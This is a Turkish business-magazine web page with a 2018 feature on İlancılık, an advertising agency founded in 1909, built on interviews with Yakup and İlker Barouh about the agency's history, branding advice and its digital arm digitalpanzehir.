			<li class="span3"><a href="http://www.kobi-efor.com.tr/ayin-konugu/adana-valisi-mahmut-demirtas-adana-markalasma-yoluna-girdi-h8048.html" title="Adana Valisi Mahmut Demirtaş: “Adana markalaşma yoluna girdi”" class="thumbnail" >
			<img src="http://www.kobi-efor.com.tr/images/haberler/ustmanset/adana-valisi-ustmanset.jpg" alt="Adana Valisi Mahmut Demirtaş: “Adana markalaşma yoluna girdi”"  />
			<div class="caption-line"><p>Adana Valisi Mahmut Demirtaş</p></div>						</a>
			</li>


		
			<li class="span3"><a href="http://www.kobi-efor.com.tr/haber/osbuk-ic-anadolu-bolge-toplantisi-kayseride-gerceklestirildi-h7991.html" title="OSBÜK İç Anadolu Bölge Toplantısı, Kayseri’de gerçekleştirildi" class="thumbnail" >
			<img src="http://www.kobi-efor.com.tr/images/haberler/ustmanset/osbuk_ustmanset.jpg" alt="OSBÜK İç Anadolu Bölge Toplantısı, Kayseri’de gerçekleştirildi"  />
			<div class="caption-line"><p>OSBÜK İç Anadolu Bölge Toplantısı,...</p></div>						</a>
			</li>


		
			<li class="span3"><a href="http://www.kobi-efor.com.tr/dosya/yerli-ve-milli-uretimin-merkez-usleri-teknoparklar-h8064.html" title="‘Yerli ve milli’ üretimin merkez üsleri: Teknoparklar" class="thumbnail" >
			<img src="http://www.kobi-efor.com.tr/images/haberler/ustmanset/teknoparklar-um_1.jpg" alt="‘Yerli ve milli’ üretimin merkez üsleri: Teknoparklar"  />
			<div class="caption-line"><p>Teknoparklar</p></div>						</a>
			</li>


		
           
          </ul>
          </div>
        </div>
        <!-- USTMANSET ***************************************************** -->
                      </div>
        </div>
        <div class="row">
                       <div class="page-header-fixed style span12 hide">
                <div class="title">AJANS: <strong class="title"></strong>
                </div>
                <div class="pull-right">                  <span class="scroll-link" id="yorumyaplink"><i class="halflings-icon white comments"></i> Yorum Yap</span>                  <a class="print" href="javascript:window.print()"><i class="halflings-icon white print"></i> Yazdır</a>
                  <a href="javascript:void(0);" onclick="shareFacebook(fbThumb, fbUrl, fbTitle, fbDesc);" class="" rel="nofollow"><i class="halflings-icon white share-alt"></i> <b>Facebook</b>'ta Paylaş</a>
                </div>
            </div>
           
          
          

          <div>
            
            <div id="main" class="span8">
              <div class="row-fulid">
                                                  <div id="breadcrumb">
    <ul class="breadcrumb">
    <li>Buradasınız: </li>
    <li><a href="http://www.kobi-efor.com.tr/">Ana Sayfa</a> <span class="divider">/</span></li>
    <li class="active"><a href="http://www.kobi-efor.com.tr/ajans">AJANS</a></li>
  </ul>
</div>
  <article id="haber">
   
  <div class="page-header">
    <div class="row-fluid muted">
      <p class="pull-left">01 Ekim 2018 Pazartesi 08:42<br>Bu haber <b>669</b> kez okundu.</p>
      <p class="pull-right karakterislem secilemez">
        <i class="glyphicons-icon font-down"></i>
        <i class="glyphicons-icon font-up"></i>
        <i class="glyphicons-icon font-normal"></i>
        <a class="print" href="javascript:window.print()"><i class="glyphicons-icon print"></i></a>
      </p>
    </div>
        <h1 class="title">İLANCILIK Reklam Ajansı, 109 yaşında</h1><p class="lead">“İlancılık, Türkiye’nin ilk reklam okulu” diyen İlancılık Reklam Ajansı Başkanı Yakup Barouh ile ajansın sektörde 100 yılı aşkın süredir yaşamını sürdürebilme başarısını konuştuk. Yenilikçi ve hızlı yapısıyla dijital çağı da yakalayan ajansın ikinci şirketi digitalpanzehir’in Ajans Başkanı İlker Barouh ise “Dijital olmazsa olmaz” vurgusu yapıyor.</p>

  </div>
    <div class="row-fluid newspic"><img src="http://www.kobi-efor.com.tr/images/haberler/ilancilik_reklam_ajansi_109_yasinda_h7984_9a242.jpg" alt="İLANCILIK Reklam Ajansı, 109 yaşında" /></div>
   
      <div class="row-fluid page-social">
      <div class="span12">
        <div class="shr">
        <div id="fb-root"></div>
<script>(function(d, s, id) {
  var js, fjs = d.getElementsByTagName(s)[0];
  if (d.getElementById(id)) return;
  js = d.createElement(s); js.id = id;
  js.src = "//connect.facebook.net/tr_TR/all.js#xfbml=1";
  fjs.parentNode.insertBefore(js, fjs);
}(document, 'script', 'facebook-jssdk'));</script>



<div class="fb-like" data-href="http://www.kobi-efor.com.tr/ajans/ilancilik-reklam-ajansi-109-yasinda-h7984.html" data-width="100" data-layout="button_count" data-action="like" data-show-faces="true" data-share="true"></div>
<div class="btn-social-wrapper">
                <a class="btn-social btn-facebook" href="https://www.facebook.com/sharer/sharer.php?u=http://www.kobi-efor.com.tr/ajans/ilancilik-reklam-ajansi-109-yasinda-h7984.html"
                    onclick="window.open(this.href, 'facebook-share','width=605,height=370');return false;"><i class="social-icon white facebook"></i> Facebook'ta Paylaş
                </a>
                <a class="btn-social btn-twitter" href="http://twitter.com/share?text=%C4%B0LANCILIK+Reklam+Ajans%C4%B1%2C+109+ya%C5%9F%C4%B1nda&url=http://www.kobi-efor.com.tr/ajans/ilancilik-reklam-ajansi-109-yasinda-h7984.html"
                    onclick="window.open(this.href, 'twitter-share', 'width=570,height=290');return false;"><i class="social-icon white twitter"></i> Tweetle
                </a>
                <a class="btn-social btn-google" href="https://plus.google.com/share?url=http://www.kobi-efor.com.tr/ajans/ilancilik-reklam-ajansi-109-yasinda-h7984.html"
                   onclick="window.open(this.href, 'google-plus-share', 'width=490,height=530');return false;"><i class="social-icon white google_plus"></i> Google+ Paylaş
                </a>
                <a class="btn-social btn-linkedin" href="http://www.linkedin.com/shareArticle?mini=true&url=http://www.kobi-efor.com.tr/ajans/ilancilik-reklam-ajansi-109-yasinda-h7984.html&title=%C4%B0LANCILIK+Reklam+Ajans%C4%B1%2C+109+ya%C5%9F%C4%B1nda"
                   onclick="window.open(this.href, 'google-plus-share', 'width=490,height=530');return false;"><i class="social-icon white linked_in"></i> LinkedIn'de Paylaş
                </a>
</div>



        </div>
      </div>
    </div>
  <div id="newstext" class="row-fluid page-content">
                          <p class="MsoPlainText"><span style="font-size: 12px;"><span style="font-family: Verdana;"><a href="http://www.kobi-efor.com.tr/haberleri/" title="" target="_blank" class="klink"></a>Türkiye reklam sektörünün dev çınarı; İlancılık Reklam Ajansı, 109. yılını kutluyor. Sektörde halen faaliyet gösteren ajansların en eskisinin 1947’lere tarihlendiği düşünüldüğünde Türkiye’nin ilk reklam ajanslarından biri olan ve 1909 yılında kurulan İlancılık Reklam Ajansı, 100 yılı aşkın süredir yaşamını sürdürebilme başarısıyla da öne çıkıyor.<br/></span><span style="font-family: Verdana;">İlancılık Reklam Ajansı’nın kurulduğu yıllar, Le Republique, L’Akcham, L’İkdam, Le Stamboul, Le Journal d’Orient, Turkiche Post, Apojevmatini, Jamanak, Aztarar gibi gazetelerin yayımlandığı yıllar… İlk adı Hoffer, Samanon ve Huli İlanat Acentesi ve logosu da HoSah olan ajansın kurucuları; David Samanon, Jak Hulli ve Ernest Hoffer. Ajansa 1933 yılında Cumhuriyet Gazetesi Yazı İşleri Müdürü Kemal Salih Sel de ortak olur. Ülkenin ilk telefon numaralarından olan 94-95’i alarak gazete ilancılığı yaparak işe başlanır. İzidor Barouh ise 1932 yılında müşteri temsilcisi ve muhasebe müdürü olur.<br/></span><span style="font-family: Verdana;">Kurucu dört ortak, reklam işinin yaratıcılık gerektirdiği bilinci ve “Bu işe otomatik olarak çocuklarımızı alırsak ve bu çocuklar yaratıcı değiller ise bu iş batar” düşüncesiyle yazılı bir anlaşma yaparlar. Anlaşmaya göre; bir ortağın ayrılması veya ölmesi durumunda hissesinin yüzde 10’u, 10 yıl boyunca ailesine kalacak, diğer yüzde 15 ise şirket ortaklarına, şirketin içinde veya dışında gelişmesine yararlı olacak bir kimseye satılacak. 17 yaşında şirkete giren İzidor Barouh böylece ortaklar arasına katılır.<br/></span><span style="font-family: Verdana;">İzidor Barouh’un oğlu Yakup Barouh’un da şirkete dahil olması, yine bu anlaşmanın kuralları çerçevesinde. Saint Joseph’in ardından Robert Kolej’de (bugünkü adıyla Boğaziçi Üniversitesi) hocaları tarafından reklam ve pazarlama eğitimi alması konusunda yönlendirilir. Robert Kolej’de iki yıl işletme, iki yıl da pazarlama eğitimi alır. Yıl 1968. Beşinci yılında ise o dönem reklamcılık alanında master yapan üç kişiden biri olan Yakup Barouh, Türkiye’de reklamcılık üzerine tez yazan ilk kişi olur.<br/></span><span style="font-family: Verdana;">Üniversitenin son yılı 1967’de ise Yakup Barouh, arkadaşları; Pınar Kılıç ve Ahmet Durul ile birlikte bir araştırma şirketi; Pars’ı kurar. Şirket, pazarlama, araştırma ve reklam servislerinin ilk harflerinden adını alır. Türkiye’nin ilk demografik araştırmasını Hürriyet için yaparlar. İlk yaptıkları bu iş, bir okur profili araştırmasıdır. Bir süre Büro Pars, İlancılık ile kardeş şirket olarak araştırmalar yapar. Daha sonra arkadaşları Pars’ta yoluna devam ederken Yakup Barouh, İlancılık’ta işe başlar. Pars sonradan McCann-Erickson bünyesine geçerek, Türkiye’nin ilk uluslararası reklam şirketi olur. Şirket, bugün Türkiye’nin en önemli reklam ajanslarından biri; Pars McCann.<br/><br/></span><strong><span style="font-family: Verdana;">“İlancılık; Türkiye’nin ilk reklam okulu”<br/></span></strong><span style="font-family: Verdana;">Banka kredisi kullanmayan, hiç borcu bulunmayan ve geçen yıl yüzde 22 civarında büyüyen İlancılık Reklam Ajansı, bugün 15 civarında büyük ve bunların yanı sıra birçok küçük ölçekli müşteriye hizmet veriyor. İlancılık’ın başarısının sırrı; imza attığı ilklerle sektörün öncülüğünü yapan ve zamanının önünde koşan bir ajans olması. İlancılık Reklam Ajansı Başkanı Yakup Barouh, Türkiye’nin köklü markalarından biri olan İlancılık Reklam Ajansı A.Ş. için; “Türkiye’nin ilk reklam okulu diyebiliriz, sektörde bizden yetişen ve çok başarılı olan birçok kişi var” diyor. Barouh, ajansın imza attığı diğer ilklere de değiniyor: “İlancılık Reklam Ajansı, (dünyanın hiçbir yerinde uygulanmazken) kreatif reklam ajansı ve medya satın alma hizmetini birlikte yürüten ve medya satın almayı Türkiye’de yaratan ilk reklam ajansı. Basın organının ciro garantili tüm reklam haklarını satın almak. Ancak bu uygulama diğer reklam ajansları arasında sorun yarattı. Reklamlar satır hesabı veya götürü usulde fiyatlandırılıyordu. İlancılık ilk ‘sütun santim’ kavramını getirdi. Ayrıca 1940’tan önce uygulanan ‘sandviç men’ dediğimiz ayaklı reklam da firmamızın fikri. Tünel vagonları içine reklam alan ilk ajansız. İlk bilgisayarla dizgi sistemini ajansa getirdim. İlk fotoğraf stüdyosunu şirketin içinde kurduk.”<br/></span><span style="font-family: Verdana;">“Hız çok önemlidir”: Reklamcılığın pazarlamanın bir bölümü olduğunu belirten Yakup Barouh, pazarlamanın 4 P’si olarak bilinen “price, place, promotion ve product (fiyat, yer, promosyon ve ürün)” anlayışına Fiat CEO’sunun bir konuşmasında eklediği yeni olgudan sözediyor: “4 P’s of marketing. Bu ifade de çoğul anlamına gelen s’yi kimse dikkate almıyor oysa o ‘s’nin anlamı ‘speed’ yani hızdır. Reklamcılıkta hız büyük önem kazandı.” Reklamcılık sektörünün diğer sektörler gibi çok hızlı değiştiğine dikkat çeken Barouh, bütün iş alanlarında rekabetin çok arttığını dolayısıyla farklı yaklaşımların daha da önem kazandığını vurguluyor: “Bizim işimiz, farklı markaları rakiplerinden ayırt edebilecek şekilde öne çıkartabilmek.”<br/></span><span style="font-family: Verdana;">“Sloganı tekrarla ve vazgeçme”: Ajans olarak araştırmaya çok önem verdiklerini kaydeden Barouh, araştırmanın reklamcıya ciddi anlamda yol gösterdiğini söylüyor. “Herhangi biri arkadaşına o markayı methettiği zaman, marka olma yoluna girilmiş demektir” diyen Barouh, markalaşma yolundakilere sloganın öneminden sözediyor: “İyi veya kötü slogan yoktur, iyi kullanılmış slogan vardır, kötü kullanılmış slogan vardır. Ortalama bir sloganı al, 5 yıl boyunca yayınla, en iyi slogan gibi karşına çıkacaktır, iyi sloganı 2 kere yayınla önemli değildir. Burada önemli olan; sloganı tekrarla ve vazgeçme; akılda kalıcılığı çok fazla olur.”<br/></span><span style="font-family: Verdana;">Müşterilerinin rakipleriyle çalışmama prensiplerinden söz eden Barouh, çalıştıkları şirketin ölçeğinden çok ürüne ve markaya inanmanın önemini aktarıyor: “Çalıştığımız birçok markayı henüz küçükken aldık, sektörünün başarılı markaları haline getirdik. Örneğin; 600 kat satış artışı sağlayan, pazar payını yüzde 60’a çıkaran Uludağ Limonata, Türkiye’de sektöründe fiyatları belirleyen kuruluş haline gelen Beypiliç. Sleepy markasının önce ıslak havlusunu lanse ettik, kalitesini anlattık, sonra çocuk bezini lanse ettik. Limonatada ‘ev yapımı tadında’, Sleepy’de ‘su ile üretim ve hijyen’ dedik, markaların farklılığını öne çıkardık. Reklamını yaptığın ürüne önce inanacaksın, ürünün özelliklerini çok iyi bileceksin, rakiplerinin kullanmadığı bir özelliği öne çıkarıp farklılık kazanacaksın. Rekabetin bol olduğu pazarda mutlaka farklılık yaratmak zorundasın. Araştırma bu noktada kritik önemde. Ürünü müşteri kadar iyi tanıyacaksın. Hedef kitleni de iyi tanıyacaksın. Ayrıca reklamda doğruyu söylemek çok önemlidir, inandırıcılığın biterse  sen de bitersin. Dijitalleşme önemli ancak hala kral, televizyondur. Bence Türkiye’de en değeri bilinmeyen; radyo. Doğru kullanıldığı zaman, radyo, çok doğru bir mecra.”<br/></span><span style="font-family: Verdana;">Müşteriyle aynı dili konuşmanın önemine de inanan Barouh, verdikleri sözü gününde tuttuklarının altını çiziyor: “İşi gününde teslim ederiz. Bu reklam sektöründe çok önemlidir. Reklam işinde yaratıcılık ön planda olacak, farklılık yaratacaksın, verdiğin sözü mutlaka tutacaksın, medyayı yakından takip edip araştırmalarını toparlayacaksın.”<br/></span><span style="font-family: Verdana;">Yakup Barouh, reklam ajansları, medya planlama ve satın alma ajansları, halkla ilişkiler ajansları ve dijital ajansların önümüzdeki 10 yıla kalmadan bir araya geleceğini ve 360 derece hizmet veren tek ajanslar haline geleceğini öngörüyor. Verdikleri hizmetin bir takım oyunu olduğuna dikkat çeken Barouh, “Biz yürüttüğümüz kampanyanın medya planlamasını da mutlaka kontrol ederek çalışmalarımızı yürütüyoruz, bazı müşterilerimize biz bu hizmeti sunuyoruz” diye konuşuyor.<br/></span><span style="font-family: Verdana;">Yakup Barouh, ajans seçiminde dikkat edilecekleri şöyle sıralıyor: “Bir ajansla senelik veya iki senelik anlaşma yapmadan önce birbirinizi karşılıklı 2-3 ay denemelisiniz. Reklam ajansı müşteri bağlantısında ise reklamcının sürekli görüştüğü kişi en azından mutlaka ikinci karar veren pozisyonunda olmalı.”<br/></span><span style="font-family: Verdana;">Küçük şirketlerin en büyük avantajlarının esnek yapıları ve hızlı hareket kabiliyetleri olduğuna işaret eden Barouh, “Mavi Okyanus Stratejisi (Blue Ocean Strategy) yürütmelisiniz. Kendinize öyle bir okyanus yaratacaksınız ki rakiplerinizin az olduğu yerde yüzeceksiniz. Öbür tarafta köpekbalıkları var ve yüzmek kolay değildir. Bazı şirketler içinse kriz döneminde reklam yapmak en doğru çalışmadır. Fiyatların henüz artmadığı, birçok reklamverenin iletişim çalışmalarını durdurduğu ortam, aslında reklam yapmak için en iyi zaman gibi duruyor” diye konuşuyor.<br/></span><span style="font-family: Verdana;">“Marka olmak demek; hedef kitleyle duygusal bir bağ kurmak, onların gözünde güvenilir ve vazgeçilmez olmak demek. Ve bir de daha pahalı olmayı hak etmek demek tabii…” diyen Barouh, markalaşma yolundakilere şunları öneriyor: “SWOT analizinizi yapın; güçlü ve zayıf yönlerinizi düşünün, fırsat ve tehditleri belirleyin. Hedef kitle profilini çıkarın. Hedef kitleniz; patronunuz, yöneticileriniz, iş arkadaşlarınız ve/veya müşterilerinizdir. Onların ihtiyaç ve beklentilerini gözden geçirin. Stratejinizi belirleyin. Hedefiniz büyük veya küçük olsun, bu aşama çok önemli. Varmak istediğiniz noktayı net bir şekilde belirlemezseniz, istikrarsız bir yolda bocalarsınız. Görsel ve sözel kimliğinizi oluşturun. Dış görünüşünüz ve konuşmanızda bir tarzınız olmalı. Bu, sizi tutarlı ve güvenilir gösterecektir. İletişimi sürekli kılın. İnsanoğlu kolay unutur. Hedef kitleyle olan bağınızı koparmamak için elinizden geldiğince (gerçek ve sanal tüm alanlarda) sosyalleşmeye çalışın. Ve en önemlisi kendinize ve kalitenize güvenin, inanın. Eğer bunu yapmazsanız ‘pazarda’ asla rekabet edemezsiniz.”<br/><br/></span><strong><span style="font-family: Verdana;">İlancılık’ın dijital koşusu;</span><font face="Verdana, sans-serif"> </font><span style="font-family: Verdana;">“digitalpanzehir”<br/></span></strong><span style="font-family: Verdana;">Hızıyla ve inovatif yaklaşımıyla çağı yakalayan ve hep önünde koşmaya gayret eden ajans olarak İlancılık, bugün ikinci şirketi “digitalpanzehir” ile dijital dünyaya da göz kırpıyor. İlancılık ile senkronize çalışan ve ayrıca müşterileri de bulunan dijital ajansın başında ise üçüncü nesilden; İlker Barouh bulunuyor. Üniversitede uluslarası ticaret okuyan, bilgisayar yazılımcılığı üzerine yüksek lisans eğitimini tamamlayan İlker Barouh’un da babası gibi tek düşüncesi reklamcılık olur. “Hep çekici geldi, reklamı sevmezsen bu iş yürümez” diyen İlker Barouh, Kristal Elma’da kazanılan ödülün de yaratıcısı.<br/></span><span style="font-family: Verdana;">digitalpanzehir Ajans Başkanı İlker Barouh anlatıyor: “İlancılık Reklam Ajansı’nda digitalpanzehir bir departman olarak kuruldu. Beş yıl önce İlancılık dışından müşteriler de başvurmaya başlayınca 2013’te digitalpanzehir kuruldu. İnternet sitesi, banner çalışmaları, sosyal medya ve farklı yazılımlarla işe başladık, dijital reklam, sosyal medyada itibar yönetimi gibi işlerle hizmet portföyümüzü genişlettik. Geleneksel mecraların da çok önemi var ancak günümüzde dijital olmazsa olmaz. Geleneksel ve dijital mecra omuz omuza devam etmeli. 20’nin üzerinde müşteriye hizmet sunuyoruz. Karlılığımız çok büyümedi ancak yıllık ciromuz yüzde 150 oranında arttı. Hem ciro hem şirket büyüklüğü anlamında var olanı sürdürebilmeyi hedefliyoruz.” </span></span></p>
<p class="MsoPlainText"><span style="font-size:12.0pt;font-family:&quot;Verdana&quot;,&quot;sans-serif&quot;;&#10;mso-bidi-font-family:&quot;Courier New&quot;"><p></p></span></p>
                  </div>

        <div class="row-fluid">
        <div id="fb-root"></div>
<script>(function(d, s, id) {
  var js, fjs = d.getElementsByTagName(s)[0];
  if (d.getElementById(id)) return;
  js = d.createElement(s); js.id = id;
  js.src = "//connect.facebook.net/tr_TR/all.js#xfbml=1";
  fjs.parentNode.insertBefore(js, fjs);
}(document, 'script', 'facebook-jssdk'));</script>



<div class="fb-like" data-href="http://www.kobi-efor.com.tr/ajans/ilancilik-reklam-ajansi-109-yasinda-h7984.html" data-width="100" data-layout="button_count" data-action="like" data-show-faces="true" data-share="true"></div>
<div class="btn-social-wrapper">
                <a class="btn-social btn-facebook" href="https://www.facebook.com/sharer/sharer.php?u=http://www.kobi-efor.com.tr/ajans/ilancilik-reklam-ajansi-109-yasinda-h7984.html"
                    onclick="window.open(this.href, 'facebook-share','width=605,height=370');return false;"><i class="social-icon white facebook"></i> Facebook'ta Paylaş
                </a>
                <a class="btn-social btn-twitter" href="http://twitter.com/share?text=%C4%B0LANCILIK+Reklam+Ajans%C4%B1%2C+109+ya%C5%9F%C4%B1nda&url=http://www.kobi-efor.com.tr/ajans/ilancilik-reklam-ajansi-109-yasinda-h7984.html"
                    onclick="window.open(this.href, 'twitter-share', 'width=570,height=290');return false;"><i class="social-icon white twitter"></i> Tweetle
                </a>
                <a class="btn-social btn-google" href="https://plus.google.com/share?url=http://www.kobi-efor.com.tr/ajans/ilancilik-reklam-ajansi-109-yasinda-h7984.html"
                   onclick="window.open(this.href, 'google-plus-share', 'width=490,height=530');return false;"><i class="social-icon white google_plus"></i> Google+ Paylaş
                </a>
                <a class="btn-social btn-linkedin" href="http://www.linkedin.com/shareArticle?mini=true&url=http://www.kobi-efor.com.tr/ajans/ilancilik-reklam-ajansi-109-yasinda-h7984.html&title=%C4%B0LANCILIK+Reklam+Ajans%C4%B1%2C+109+ya%C5%9F%C4%B1nda"
                   onclick="window.open(this.href, 'google-plus-share', 'width=490,height=530');return false;"><i class="social-icon white linked_in"></i> LinkedIn'de Paylaş
                </a>
</div>



        </div>
</article>

      <div class="row-fluid galleries">
    <div class="title">
      <span>İlgili Galeriler</span><hr>
    </div>
    <div class="content">
            <div class="span3">
        <a href="http://www.kobi-efor.com.tr/carklar-daha-hizli-donecek-resimleri,44.html" title="Çarklar Daha Hızlı Dönecek">
          <img src="http://www.kobi-efor.com.tr/images/album/thumbs/2013-ayarli-buyume_1.jpg" alt="Çarklar Daha Hızlı Dönecek" />
          <b>Çarklar Daha Hızlı...</b>
        </a>
      </div>
            <div class="span3">
        <a href="http://www.kobi-efor.com.tr/turizm-resimleri,43.html" title="Turizm">
          <img src="http://www.kobi-efor.com.tr/images/album/thumbs/turizm_2.jpg" alt="Turizm" />
          <b>Turizm</b>
        </a>
      </div>
            <div class="span3">
        <a href="http://www.kobi-efor.com.tr/telekomunikasyon-resimleri,42.html" title="Telekomünikasyon">
          <img src="http://www.kobi-efor.com.tr/images/album/thumbs/telekomunikasyon_1.jpg" alt="Telekomünikasyon" />
          <b>Telekomünikasyon</b>
        </a>
      </div>
            <div class="span3">
        <a href="http://www.kobi-efor.com.tr/madencilik-resimleri,41.html" title="Madencilik">
          <img src="http://www.kobi-efor.com.tr/images/album/thumbs/madencilik_1.jpg" alt="Madencilik" />
          <b>Madencilik</b>
        </a>
      </div>
          </div>
  </div>
    <div id="yorumyap" style="margin:0"></div>
  <div class="row-fluid keywords"><div class="title"><span>Anahtar Kelimeler</span><hr></div><a href="http://www.kobi-efor.com.tr/haberleri/Yakup+Barouh" title="Yakup Barouh haberleri">Yakup Barouh</a><a href="http://www.kobi-efor.com.tr/haberleri/%C4%B0lanc%C4%B1l%C4%B1k+Reklam+Ajans%C4%B1" title="İlancılık Reklam Ajansı haberleri">İlancılık Reklam Ajansı</a></div>
    <section>
            <div id="yorumlar">
            <ul class="nav nav-tabs" id="ytab">
              <li class="active"><a href="#yorumpanel" data-toggle="tab">Yorum Gönder <span class="label label-important">0</span></a></li>
               <li><a href="#facebookpanel" class="fbyorum" data-toggle="tab">Facebook Yorumları <span class="label label-inverse"><fb:comments-count href="http://www.kobi-efor.com.tr/ajans/ilancilik-reklam-ajansi-109-yasinda-h7984.html">0</fb:comments-count></span></a></li>            </ul>

            <div class="tab-content">
                              <div class="tab-pane active" id="yorumpanel">
                                    <div class="yorumlar panel">
                    <div id="yorumpaneli" class="row-fluid">
                    <form  name="comment" class="comment_form" id="addcomment">
                        <div class="span1">
                                                        <img src="http://www.kobi-efor.com.tr/_themes/hs-vertigo/images/no_author.jpg" alt="Misafir Avatar" class="img-rounded"/>                        </div>
                        <div class="span11">
                            <div class="row-fluid">
                                <div class="input-prepend span6">
                                    <span class="add-on">İsim</span>
                                    <input name="isim"  class="span10 adsoyad" type="text"  id="adsoyad" size="30" maxlength="50"  title="Ad soyad gerekli!" />
                                </div>
                                                                <!--div class="input-prepend span6">
                                    <span class="add-on">E-Posta</span>
                                    <input name="email"  class="span9" type="text"  id="email" size="30" maxlength="50" value="" style="width: 202px;"  title="Yayınlanmayacak!" />
                                </div-->
                                                            </div>
                            <textarea name="yorum" maxlength="1000" class="span12" id="comment_field" onkeyup="textKey(this.form)" onfocus="textCheckFocus(this)" onblur="textCheckBlur(this)">Yorum yazmak için bu alanı kullanabilirsiniz. Yorum yazarken lütfen aşağıda yazılan uyarıları göz önünde bulundurunuz!</textarea>
                            <div class="span12" style="margin:0;">
                            <div class="answer span5" style="display:none;">Yanıt: <b>@name</b> <a href="javascript:void(0)" class="kaldir">x</a></div>
                            <a type="button" href="javascript:void(0)" onclick="javascript:comment_send(7984);return false;" class="btn btn-warning pull-right">Yorum Gönder</a>
                            <div class="karakter span4 pull-right">Kalan Karakter: <input name="character" id="character" disabled size="3" value="1000"></div></div>
                        </div>
                        <input type="hidden" name="hid" value="7984" />
                        <input type="hidden" name="uid" value="0" />
                        <input type="hidden" name="tip" value="haber" />
                        <input type="hidden" name="cevap" value="" class="answer" />
                        <input type="hidden" name="cevap_id" value="0" class="cevap_id" />
                        <input type="hidden" name="token" value="e7d4300bd7cc50df9cc1566dcbf181fa57f2627a" />

                    </form>
                    </div>
                    <div class="alert">Yorumunuz onaylanmak üzere yöneticiye iletilmiştir.<a class="close" data-dismiss="alert" href="#">&times;</a></div>
                </div> 
            
            
            
            </div> <!-- .tab-pane -->


                          <div class="tab-pane yorumlar fbpanel" id="facebookpanel">
                <div class="row-fluid">
                  <div id="fb-root"></div>
                  <script>(function(d, s, id) {
                    var js, fjs = d.getElementsByTagName(s)[0];
                    if (d.getElementById(id)) return;
                    js = d.createElement(s); js.id = id;
                    js.src = "//connect.facebook.net/tr_TR/all.js#xfbml=1";
                    fjs.parentNode.insertBefore(js, fjs);
                  }(document, 'script', 'facebook-jssdk'));</script>
                  <div class="fb-comments" data-href="http://www.kobi-efor.com.tr/ajans/ilancilik-reklam-ajansi-109-yasinda-h7984.html" data-width="603" data-colorscheme="light" data-numposts="10"></div>
                </div> <!-- #facebookpanel -->
              </div>
            
          </div> <!-- .tab-content -->

        </div> <!-- #yorumlar -->

 
  </section>
    <div class="box haberler">
    <div class="box header">
      <h5><i class="glyphicons-icon globe"></i> <b>İlgili Haberler</b></h5>
    </div>
    <div class="box content">
      <div class="row-fluid first">
              <div class="span3">
          <a href="http://www.kobi-efor.com.tr/ajans/dijitalde-seviye-yukselten-ajans-levelup-h7888.html" title="Dijitalde seviye yükselten ajans; LEVELUP">
            <img src="http://www.kobi-efor.com.tr/images/haberler/thumbs/dijitalde_seviye_yukselten_ajans_levelup_h7888_63bf2.jpg" alt="Dijitalde seviye yükselten ajans; LEVELUP" />
            <b>Dijitalde seviye yükselten ajans; LEVELUP</b>
          </a>
        </div>  
                      <div class="span3">
          <a href="http://www.kobi-efor.com.tr/ajans/sektorun-koklu-cinari-dijital-ile-gelecege-goz-kirpiyor-emek-ajans-h7548.html" title="Sektörün köklü çınarı, dijital ile geleceğe göz kırpıyor; Emek Ajans">
            <img src="http://www.kobi-efor.com.tr/images/haberler/thumbs/sektorun_koklu_cinari_dijital_ile_gelecege_goz_kirpiyor_emek_ajans_h7548_d1dbd.jpg" alt="Sektörün köklü çınarı, dijital ile geleceğe göz kırpıyor; Emek Ajans" />
            <b>Sektörün köklü çınarı, dijital ile geleceğe...</b>
          </a>
        </div>  
                      <div class="span3">
          <a href="http://www.kobi-efor.com.tr/ajans/yatirimin-geri-donusu-odakli-dijital-ajans-boomerang-2020de-avrupadan-dunyaya-acilacak-h7471.html" title="“Yatırımın geri dönüşü” odaklı dijital ajans; Boomerang, 2020’de Avrupa’dan dünyaya açılacak">
            <img src="http://www.kobi-efor.com.tr/images/haberler/thumbs/yatirimin_geri_donusu_odakli_dijital_ajans_boomerang_2020de_avrupadan_dunyaya_acilacak_h7471_e3331.jpg" alt="“Yatırımın geri dönüşü” odaklı dijital ajans; Boomerang, 2020’de Avrupa’dan dünyaya açılacak" />
            <b>“Yatırımın geri dönüşü” odaklı dijital...</b>
          </a>
        </div>  
                </div> 
        <div class="row-fluid">
                      <div class="span3">
          <a href="http://www.kobi-efor.com.tr/ajans/native-digital-yerli-fikir-global-etki-h7235.html" title="Native Digital; “Yerli fikir, global etki”">
            <img src="http://www.kobi-efor.com.tr/images/haberler/thumbs/native_digital_yerli_fikir_global_etki_h7235_1e5c2.jpg" alt="Native Digital; “Yerli fikir, global etki”" />
            <b>Native Digital; “Yerli fikir, global etki”</b>
          </a>
        </div>  
                      <div class="span3">
          <a href="http://www.kobi-efor.com.tr/ajans/verimli-surdurulebilir-rekabetci-satin-alma-cozumleriyle-turkiyenin-ilk-ve-en-buyuk-satin-alma-sirketi-zer-h7171.html" title="“Verimli, sürdürülebilir, rekabetçi satın alma çözümleriyle” Türkiye’nin ilk ve en büyük satın alma şirketi; ZER">
            <img src="http://www.kobi-efor.com.tr/images/haberler/thumbs/verimli_surdurulebilir_rekabetci_satin_alma_cozumleriyle_turkiyenin_ilk_ve_en_buyuk_satin_alma_sirketi_zer_h7171_6f2aa.jpg" alt="“Verimli, sürdürülebilir, rekabetçi satın alma çözümleriyle” Türkiye’nin ilk ve en büyük satın alma şirketi; ZER" />
            <b>“Verimli, sürdürülebilir, rekabetçi satın alma...</b>
          </a>
        </div>  
                      <div class="span3">
          <a href="http://www.kobi-efor.com.tr/ajans/feveran-iletisimin-mottosu-iletisim-markalarin-olcusudur-h7124.html" title="Feveran İletişim’in mottosu; “İletişim markaların ölçüsüdür”">
            <img src="http://www.kobi-efor.com.tr/images/haberler/thumbs/feveran_iletisimin_mottosu_iletisim_markalarin_olcusudur_h7124_8299b.jpg" alt="Feveran İletişim’in mottosu; “İletişim markaların ölçüsüdür”" />
            <b>Feveran İletişim’in mottosu; “İletişim markaların...</b>
          </a>
        </div>  
                    </div> 
    </div>
  </div>
   
                 
              </div>
            </div>
                        <div class="aside">
              <div id="sidebar" class="span4">
                <div class="row-fulid">
                                                                    <!-- ONE CIKANLAR  -->
            <div id="onecikanlar">
              <div class="header">
                <h5><i class="halflings-icon white star"></i>Reel Sektör Haberleri</h5>
                <a class="control left" href="#" id="onprev"></a>
                <a class="control right" href="#" id="onnext"></a>
              </div>
              <div class="content">
                  <div class="item">
                                    <a href="http://www.kobi-efor.com.tr/reel-sektor/xerox-brenva-hd-production-pressten-3-cazip-ozellik-h8052.html" title="Xerox Brenva HD Production Press&#039;ten 3 cazip özellik">
